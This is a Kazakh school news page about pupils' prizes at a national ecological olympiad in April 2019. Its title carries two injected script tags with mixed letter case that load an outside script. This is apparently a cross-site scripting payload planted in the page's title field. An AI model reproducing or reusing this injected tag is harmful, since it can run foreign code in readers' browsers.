Қазақстан Республикасының экологиялық олимпиадасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.04.2019

Сәуірдің 4-5 күні «Звездный» балаларды сауықтыру орталығында Қазақстан Республикасының экологиялық олимпиадасы болып өтті. Бұл олимпиадаға ауданымыздан 8 оқушы қатысты. Соның ішінде мектебімізден 10 «Б» сынып оқушысы Яндуткина Карина экологиялық жобалар қорғау  сайысына қатысып 2 орынды қанжығасына байлады. 8 «Б» сынып оқушысы Алимова Малика компьютерлік презентациялар сайысында 3 орын иеленді.  Ал вокал сайыысына қатысқан 9 «А» сынып оқушысы Әбдіразақ Әлішер мен видео жасау сайысына қатысқан 6 «А» сынып оқушысы Әбдіразақ Інжу-Маржан қатысқаны үшін сертификаттармен марапатталды. Оқушылардың барлығына экологиялық олимпиада төсбелгісі берілді.  Балалар сайыста барын салып, белсенді қатысты. Екі күн ішінде ерекше көңіл-күйге бөленіп қайтты.

Просмотров: 775


Пікір қосу



Деректерді қолтаңбаға қосу